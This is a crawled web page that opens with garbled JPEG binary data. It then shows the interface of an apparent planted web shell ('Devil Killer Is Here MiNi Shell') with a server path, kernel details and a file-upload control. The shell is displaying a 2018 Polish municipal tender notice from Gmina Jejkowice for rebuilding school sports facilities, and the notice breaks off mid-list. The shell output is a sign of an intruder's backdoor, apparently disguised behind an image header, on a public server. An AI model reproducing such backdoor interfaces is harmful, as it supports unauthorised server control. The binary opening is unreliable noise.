JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180628/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180628/580493-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 580493-N-2018 z dnia 2018-06-28 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Jejkowice</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Przebudowa szkolnych obiektów sportowych przy ul. Szkolnej w Jejkowicach</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Jejkowice</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">276258760</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Główna</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">38a</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">44-290 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Jejkowice</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">324 302 002</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">ug@jejkowice.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">324 302 880</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.jejkowice.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.jejkowice.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Gminy Jejkowice, ul. Główna 38a, 44-290 Jejkowice</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Przebudowa szkolnych obiektów sportowych przy ul. Szkolnej w Jejkowicach</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">IN.271.4.2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci"></span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiotem zamówienia jest wykonanie zadania pn. ,,Przebudowa szkolnych obiektów sportowych przy ul. Szkolnej w Jejkowicach"1.1.1 Przedmiot zamówienia obejmuje m.in.wykonanie:- boiska do piłki nożnej z trawy syntetycznej;- boiska wielofunkcyjnego z nawierzchni syntetycznej poliuretanowej EPDM;- bieżni prostej - dystans 100 m;- skoczni do skoku w dal;- boiska do siatkówki plażowej;- ciągów komunikacyjnych stanowiących dojścia do obiektów sportowych - nawierzchnia z kostki brukowejbetonowej;- ogrodzenia;- zagospodarowania terenów zielonych z obsianiem trawą;- wyposażenia boisk;- małej architektury;- miejsc postojowych dla samochodów użytkowników przebywających okresowo;- oświetlenia zewnętrznego1.2 Szczegółowy opis przedmiotu zamówienia stanowią:a) Dokumentacja projektowa,b) Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych,c) Przedmiar robót,d) Harmonogram rzeczowo - finansowystanowiące załączniki do Specyfikacji Istotnych Warunków Zamówienia.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45112720-8</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45000000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45212221-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45236110-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111200-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233300-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45233100-0</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-10-31</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2018-10-31</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalnościzwiązanej z przedmiotem zamówienia, na kwotę nie mniejszą niż 500 000,00 PLN;</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">3.2.1 Wykonawca musi wykazać, iż wykonał w okresie ostatnich pięciu [5] lat przed terminem składaniaofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalnościjest krótszy - w tym okresie, co najmniej jedną [1] robotę budowlaną polegającą na wykonaniu nawierzchni sportowej poliuretanowej na podbudowie z kruszyw lub podbudowie betonowej, o powierzchni nie mniejszej niż 600 m2 lub co najmniej dwie roboty budowlane polegające na wykonaniu: nawierzchni sportowej poliuretanowej na podbudowie z kruszyw lub podbudowie betonowej (min. 1 robota budowlana) i budowy boiska ze sztuczną trawą na podbudowie z kruszyw lub podbudowie betonowej (min. 1 robota budowlana), o powierzchni nie mniejszej niż 300 m2 każda. Roboty te winny być wykonane należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończone.UWAGA1: Pod pojęciem nawierzchni sportowej Zamawiający rozumie nawierzchnię przygotowanąkonstrukcyjnie, z wyznaczonymi polami umożliwiającą prowadzenie rozgrywek sportowych w co najmniejdwóch dyscyplinach sportowych (np. piłka ręczna i koszykówka).3.2.2 Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) osobami niezbędnymi dowykonania niniejszego zamówienia tj. osobą zdolną do kierowania budową posiadającą uprawnieniabudowlane do kierowania robotami budowlanymi w specjalności konstrukcyjnej lub drogowej lubodpowiadające im ważne uprawnienia budowlane wydane na podstawie przepisów obowiązującychw dacie ich wydania;Uwagi dotyczące wszystkich warunków udziału w postępowaniu:UWAGA2: W przypadku wskazania przez Wykonawcę, w celu wykazania spełnienia warunków udziału, waluty inna niż polska (PLN), w celu jej przeliczenia stosowany będzie średni kurs NBP na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.UWAGA3: Mając na uwadze art. 23 ust. 5 ustawy Zamawiający zastrzega, że w sytuacji składania ofertyprzez dwa lub więcej podmiotów (Wykonawcy wspólnie ubiegający się o udzielenie zamówienia) orazanalogicznie w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadachokreślonych w art. 22a ustawy, warunki o których wyżej mowa muszą zostać spełnione w całości przezWykonawcę (jednego z Wykonawców wspólnie składającego ofertę) lub podmiot, na którego zdolnościw tym zakresie powołuje się Wykonawca - brak możliwości tzw. sumowania doświadczenia.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">4.2.1 odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeliodrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstawwykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy, czyli tych, o których mowa w punkcie XIII.2.2.niniejszej SIWZ.4.2.2 zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalegaz opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składaniaofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentupotwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawiespłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskałprzewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymaniew całości wykonania decyzji właściwego organu;4.2.3 